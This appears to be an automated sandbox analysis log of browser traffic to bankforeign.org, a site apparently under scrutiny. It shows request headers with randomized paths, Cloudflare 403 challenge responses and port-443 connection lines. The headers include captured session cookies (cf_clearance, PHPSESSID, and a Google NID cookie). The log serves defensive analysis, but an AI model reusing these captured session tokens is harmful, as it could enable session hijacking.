          Source: global trafficHTTP traffic detected: GET /js/a8fa5b4494ce08322db1f933d9e75f5e65bc015265adf HTTP/1.1Host: bankforeign.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1Host: bankforeign.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bankforeign.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1Host: bankforeign.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
          Source: global trafficHTTP traffic detected: GET /APP-a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb6e/a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb6f HTTP/1.1Host: bankforeign.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
          Source: global trafficHTTP traffic detected: GET /o/a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb9d HTTP/1.1Host: bankforeign.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
          Source: global trafficHTTP traffic detected: GET /ASSETS/img/m_.svg HTTP/1.1Host: bankforeign.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
          Source: global trafficHTTP traffic detected: GET /ASSETS/img/sig-op.svg HTTP/1.1Host: bankforeign.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
          Source: global trafficHTTP traffic detected: GET /x/a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb75 HTTP/1.1Host: bankforeign.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
          Source: global trafficHTTP traffic detected: GET /o/a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb9d HTTP/1.1Host: bankforeign.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
          Source: global trafficHTTP traffic detected: GET /ASSETS/img/m_.svg HTTP/1.1Host: bankforeign.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
          Source: global trafficHTTP traffic detected: GET /x/a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb75 HTTP/1.1Host: bankforeign.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
          Source: global trafficHTTP traffic detected: GET /ASSETS/img/sig-op.svg HTTP/1.1Host: bankforeign.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
          Source: unknownDNS traffic detected: queries for: clients2.google.com
          Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 01 Feb 2024 20:38:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13690Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XWonk4WN1fK11FFTlQAyh5jVGD5LFYIuZ6cyrtPkH5WgwrJJZ6GQ6PQqhS7tgzMVD%2FJPbrnp1dK97yUgyQFNns5HCnxhVvorXpveZxyHEpk%2FOWfQ6IW6or1db8YkiaLJSXI%3D"}],"group":"cf-nel","max_age":604800}
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 01 Feb 2024 20:38:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13888Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jyxsmIbveDtJWYyDhPKro74nUJZ8nxWFUBrskNzmXJ7vLWVXpZCIx4or31reTfVs4serxkhASInJeLvd%2F3xnMUYhnHYEKU4du0Z194H5FuDsOuMuZF5nvnZlpfI6K3Hb1Yo%3D"}],"group":"cf-nel","max_age":604800}
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 01 Feb 2024 20:38:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13867Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KJolI7yEwfhDYjAdjyKxyiqwt8uFoWSCz9Jbvw4kvB7IOVBhFuKk6tIfgcVlND9%2BppF1a%2BMwZb6zMKY19dilN6P7CupMleLknnWVaPsVEvGu1n6Df8oIpGlhHxPkpKHk2og%3D"}],"group":"cf-nel","max_age":604800}
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 01 Feb 2024 20:38:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13973Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uNYBg81%2BCsBNszntAnI6uaIX2UzflAcg9b0weHjcz4ApmpUwk6Ns9ff%2BFbea4T1jyqQBYlB41MomciDiFLnboKvnFPDN1zglE6xsfo2rKPJASKs4XtI9tdm0JDDwRjiFUo4%3D"}],"group":"cf-nel","max_age":604800}
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 01 Feb 2024 20:38:47 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: MISSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rB3FWfi%2BW695oJW4W4vbq%2FZGc3lXaY9Q8DrULI0U6hrgEX8qS6bpXiwZNg8rKwQi%2FXlQT7BeWKsSdmAvPbWawNgY7GDHjEiZ0Whg5E23fdS8B05YuCkkBTtIUNG7im0tzg0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 84ecfff5bba6b0a5-ATLalt-svc: h3=":443"; ma=86400
          Source: chromecache_63.2.drString found in binary or memory: https://getbootstrap.com/)
          Source: chromecache_63.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
          Source: chromecache_63.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
